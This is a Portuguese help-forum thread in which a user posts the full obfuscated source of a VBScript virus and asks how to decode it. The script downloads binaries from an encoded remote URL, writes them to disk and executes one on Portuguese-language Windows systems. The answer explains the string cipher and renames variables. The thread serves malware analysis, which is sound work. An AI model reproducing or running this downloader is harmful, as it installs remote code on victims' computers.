# Descriptografar vírus - vbscript

Tags: criptografia, vbs

```
Option Explicit
On Error Resume Next
dim rbs309
dim tadjakmnmfrg4460
dim icsnvk206
dim wsmp1276
dim falkal1610
dim rfqgobyeyrp5319
dim gtxhgi5556
dim mll8810
dim qxat8709
dim hgurgqrv3280
dim baknqdo6857
dim cioslu3564
dim sndohhjq1214
dim lwwfaim8338
dim haprm493
dim iltkfxbb2382
dim dhydlcp7543
dim qpdu6740
dim gtlbowwr6975
dim xcyi8081
dim isfotb6795
dim uguojbssq5199
dim dycbyrmy5608
dim suqmi6111
dim mojspk6072
dim gwjdvxqxpi1867
dim syc9022
dim cwnilskntu6156
dim jycej9917
dim kaumen4761
dim hpml9179
dim stwjmww5737
dim mju2625
dim idmndh94
dim lkrm5932
dim kfdvhjl9992
dim fyv2635
dim njuv4832
dim ygvhoo991
dim twfygbvnne8124
dim kwjktixh825

kwjktixh825         = "ijn34g"
rbs309              = uckp9923(fdhtrhou8434("ÊÌâbd™à×Ï˜¨–žšŸadœš˜¦lb—™œbn×ÝÞÖ"))
tadjakmnmfrg4460    = uckp9923(fdhtrhou8434(""))
icsnvk206           = uckp9923(fdhtrhou8434("šÝ›—•ÖÕ"))
wsmp1276            = uckp9923(fdhtrhou8434("ÔÜÝª¨Ì·˜â£ÙÌ½Å"))
falkal1610          = uckp9923(fdhtrhou8434("ÕÖÓ›‡•ÝÚ×¥—ºÀ"))
rfqgobyeyrp5319     = uckp9923(fdhtrhou8434("Õ×â›b—"))
gtxhgi5556          = uckp9923(fdhtrhou8434("ÐÚØa—"))
mll8810             = uckp9923(fdhtrhou8434("¹º¯X"))
qxat8709            = uckp9923(fdhtrhou8434("Ž«Âtx"))
hgurgqrv3280        = uckp9923(fdhtrhou8434("ÏÓÕa¬"))
baknqdo6857         = uckp9923(fdhtrhou8434("ÖËÓ¥¨º—¬²‚x¨"))
cioslu3564          = uckp9923(fdhtrhou8434("ÝÍÓ–¶ÖÏâ¦­ºÎÖ×ybÎ×Óâ£ÙÌ½"))
sndohhjq1214        = uckp9923(fdhtrhou8434("‰ÝS™ßÎ˜ f¦ÝÜÑÓ¥"))
lwwfaim8338         = uckp9923(fdhtrhou8434("ÍÓ"))
haprm493            = uckp9923(fdhtrhou8434("Õ×â›bÊ"))
iltkfxbb2382        = uckp9923(fdhtrhou8434("Õ×â›b"))
dhydlcp7543         = uckp9923(fdhtrhou8434("š˜£a¨ÚÎßß˜†×ÝÞ¶¡¾—Úâ§|ÕÒÁ"))
qpdu6740            = uckp9923(fdhtrhou8434("™˜Ÿb¦ÌÝÞÓš“àÛËÜœ–"))
kfdvhjl9992         = uckp9923(fdhtrhou8434("ÅÍ×Ÿ–Ü¹Æá¥™Ú¾Æ¨v"))
fyv2635             = uckp9923(fdhtrhou8434("ÅÝà˜§¼‰ÖÚtÚÐØ×§¨Ì¼ŠÒ¡•‡ÜÞÜ˜¡ÜÌÙ²nª"))
njuv4832            = uckp9923(fdhtrhou8434("Åâ"))
twfygbvnne8124      =  1046
buoyc2863           = uckp9923(fdhtrhou8434("½½½ƒ"))


Function fdhtrhou8434(Str)
str = Replace(str,"@","")
fdhtrhou8434 = str
End Function       

Function uckp9923(Str)
 Dim dxjc2225, mpbx3317, lww1640, ogngfnwbr3141, rbtac94, umr8295, iael1408, lbf7910
 rbtac94    = "" 
 dxjc2225   = Len(kwjktixh825)
 mpbx3317   = 1
 lww1640    = Len(Str) 
 str        = StrReverse(str) 

 For ogngfnwbr3141 = lww1640 To 1 Step -1
      umr8295   = asc(Mid(str,ogngfnwbr3141,1))
      iael1408  = Asc(Mid(kwjktixh825,mpbx3317,1))
      rbtac94   = rbtac94  &  chr(umr8295 - iael1408)
      lbf7910   = 1
      mpbx3317  = mpbx3317+lbf7910
      lbf7910   = 1

      If mpbx3317 > dxjc2225 Then 
        mpbx3317 = lbf7910
      Next
      rbtac94   = StrReverse(rbtac94)
      uckp9923  = rbtac94 
End Function


gtlbowwr6975    = chr(34)
set xcyi8081    = CreateObject(wsmp1276)
Set isfotb6795  = WScript.CreateObject(falkal1610)
dycbyrmy5608    =  xcyi8081.ComputerName
Set mojspk6072  = CreateObject(cioslu3564)

if mojspk6072.FolderExists(kfdvhjl9992) then 
    uguojbssq5199 = kfdvhjl9992  &  Left(dycbyrmy5608, 3)   &   njuv4832
else
    uguojbssq5199 = fyv2635  &  Left(dycbyrmy5608, 3)  &  njuv4832
end if

suqmi6111       = uguojbssq5199   &  Left(dycbyrmy5608, 3)  &  hgurgqrv3280

Function BinaryGetURL(strURL)
  Dim objWinHttp
  Dim lngTimeout
  Dim strMethod
  Dim strPostData
  Dim strUserAgentString
  Dim intSslErrorIgnoreFlags
  Dim blnEnableRedirects
  Dim blnEnableHttpsToHttpRedirects

  lngTimeout                    = 59000
  strMethod                     = "GET"
  strPostData                   = ""
  intSslErrorIgnoreFlags        = 13056
  blnEnableRedirects            = True
  blnEnableHttpsToHttpRedirects = True
  Set objWinHttp                = CreateObject(dhydlcp7543)
  objWinHttp.SetTimeouts lngTimeout, lngTimeout, lngTimeout, lngTimeout
  objWinHttp.Option(0)          = qpdu6740
  objWinHttp.Option(4)          = intSslErrorIgnoreFlags
  objWinHttp.Option(6)          = blnEnableRedirects
  objWinHttp.Option(12)         = blnEnableHttpsToHttpRedirects
  objWinHttp.Open strMethod, strURL, False 
  If strMethod = "buoyc2863" Then
    objWinHttp.setRequestHeader "Content-type", _ "application/x-www-form-urlencoded"
  End If

  objWinHttp.Send  strPostData 
  If (objWinHttp.Status = 200) Then
    BinaryGetURL = objWinHttp.ResponseBody
  End If
  Set objWinHttp = Nothing
End Function

Function SaveBinaryData(arrByteArray, strFN)
dim ryu9878, vocehkn515
ryu9878 = strFN
vocehkn515 = 2
  If VarType(arrByteArray) >= 8192 Then
    Dim objBS
    Set objBS = CreateObject(baknqdo6857)
    with objBS
        .Type = 1 
        .Open()
        .Write(arrByteArray)
        .SaveToFile ryu9878 , vocehkn515
    End With

  End If 
End Function 
 Set stwjmww5737 = GetObject(uckp9923(fdhtrhou8434("›àÛœ—ÃÝÙÝ¥•ÅÆ°™ÛÊØÝ¦¦ÌÙ××p ÌßÏº¡£ÐÝËÜ¢§ÙÎÚÛœ¯¡ÜÞÛš¡ÕÒá")))
 Set mju2625 = stwjmww5737.ExecQuery(uckp9923(fdhtrhou8434("ÖÏâ¦­ºÐØ×§•ÙÎÚ½’fš×ÓÅS¡ÖÛÐŽ]TÛÌÏÚ˜‡")))
 For Each idmndh94 in mju2625
lkrm5932 = idmndh94.OSlanguage
 Next
mojspk6072.CreateFolder(uguojbssq5199)
If (mojspk6072.FileExists(uguojbssq5199 & lwwfaim8338) = false and twfygbvnne8124 = lkrm5932) Then
Set gwjdvxqxpi1867 = mojspk6072.OpenTextFile(uguojbssq5199 & lwwfaim8338,8,true,false)
gwjdvxqxpi1867.WriteLine icsnvk206
gwjdvxqxpi1867.Close
Do
SaveBinaryData BinaryGetURL(rbs309 & iltkfxbb2382), uguojbssq5199 & Left(dycbyrmy5608, 2) & "k"
Loop Until mojspk6072.FileExists(uguojbssq5199 & Left(dycbyrmy5608, 2) & "k") = true
Do
SaveBinaryData BinaryGetURL(rbs309 & "o" & iltkfxbb2382), uguojbssq5199 & Left(dycbyrmy5608, 2) & "o"
Loop Until mojspk6072.FileExists(uguojbssq5199 & Left(dycbyrmy5608, 2) & "o") = true
Do
SaveBinaryData BinaryGetURL(rbs309 & "e" & iltkfxbb2382), uguojbssq5199 & Left(dycbyrmy5608, 2) & "e"
Loop Until mojspk6072.FileExists(uguojbssq5199 & Left(dycbyrmy5608, 2) & "e") = true
Do
SaveBinaryData BinaryGetURL(rbs309 & haprm493), suqmi6111
Loop Until mojspk6072.FileExists(suqmi6111) = true
isfotb6795.run sndohhjq1214 & gtlbowwr6975 & suqmi6111 & gtlbowwr6975 &  " " & tadjakmnmfrg4460
End If
```

**Recebi um vírus feito em vbscript e gostaria de aprender a descriptografá-lo. 
Gostaria de saber quais os passos ou assuntos que preciso estudar ou pesquisar para descriptografar isso. E, caso exista um site ou programa que faça isso, agradeço quem puder me ajudar.**

Comment: Essas coisas nao costumam estar criptografadas, e sim apenas um pouco embaralhadas. Geralmente a função que desembaralha está junto do código (senão nem funcionaria). É muito longo o código todo?

Comment: @Bacco, editei. Código completo.

Comment: dei uma pincelada por cima na resposta, ao menos para dar o caminho inicial. Se sobrar algum tempo, talvez eu ponha mais etapas nela depois. Acho que como está já dá uma noção boa de como "destrinchar" o código.

Answer (score 8, accepted):

Basicamente é um jogo de substituições. Não pretendo discorrer sobre a função toda, senão a resposta vai ficar imensa (posso mudar de idéia depois), mas seguem os passos principais para dar uma idéia:

Você tem partes conhecidas, basta trocá-as até o código ficar legível.

Por exemplo, a função fdhtrhou8434 basicamente troca `@` por coisa nenhuma, então podemos eliminá-la de todas as linhas que não tem @. Por exemplo

```
rbs309 = uckp9923(fdhtrhou8434("ÊÌâbd™à×Ï˜¨–žšŸadœš˜¦lb—™œbn×ÝÞÖ"))
```

é o mesmo que

```
rbs309 = uckp9923("ÊÌâbd™à×Ï˜¨–žšŸadœš˜¦lb—™œbn×ÝÞÖ")
```

Quanto à função `uckp9923`, ela basicamente corre a string do fim para o começo, e subtrai os bytes da string "ijn34g", contida em `kwjktixh825`

```
  umr8295   = asc(Mid(str,ogngfnwbr3141,1))
  iael1408  = Asc(Mid(kwjktixh825,mpbx3317,1))
  rbtac94   = rbtac94  &  chr(umr8295 - iael1408)
```

Se você aplicar isto às variaveis embaralhadas, vai obter uma série de strings legíveis.

Essas strings vão te mostrar de onde é que a função `Function BinaryGetURL(strURL)` vai baixar algum código, que pode ser um malware, por exemplo, e gravar o mesmo no seu HD usando a função `SaveBinaryData`.

O código está meramente ofuscado, só para dar trabalho e sua intenção não ficar visível na primeira lida, mas é técnica típica de *[script kiddies](https://en.wikipedia.org/wiki/Script_kiddie)* basicamente.

Veja só como o código parece muito mais normal trocando apenas algumas variáveis de nome, o que pode ser feito facilmente com um "procurar e substituir" de qualquer editor de código:

```
Function uckp9923(Str)
 resultado      = "" 
 tamanhoChave   = Len( chave )
 iChave         = 1
 tamanhoEntrada = Len(Str) 
 str            = StrReverse(Str) 

 For i = tamanhoEntrada To 1 Step -1
    letraEntrada = Asc( Mid( Str, i, 1 ) )
    letraChave   = Asc( Mid( chave, iChave, 1))
    resultado    = resultado&  chr(letraEntrada - letraChave)
    um = 1
    iChave = iChave + um
    um = 1

    If iChave > tamanhoChave Then 
      iChave = um
    Next
    resultado = StrReverse(resultado)
    uckp9923  = resultado
End Function
```

É exatamente a mesma função, só troquei o nome das variáveis para facilitar a leitura.

Comment: Muito obrigado por sua resposta. Já me deu uma boa noção. Agradeço muito sua ajuda. Irei estudar melhor esse código. E se puder descrever melhor seus passos até chegar nesse resultado eu agradeço mais ainda. Abraço!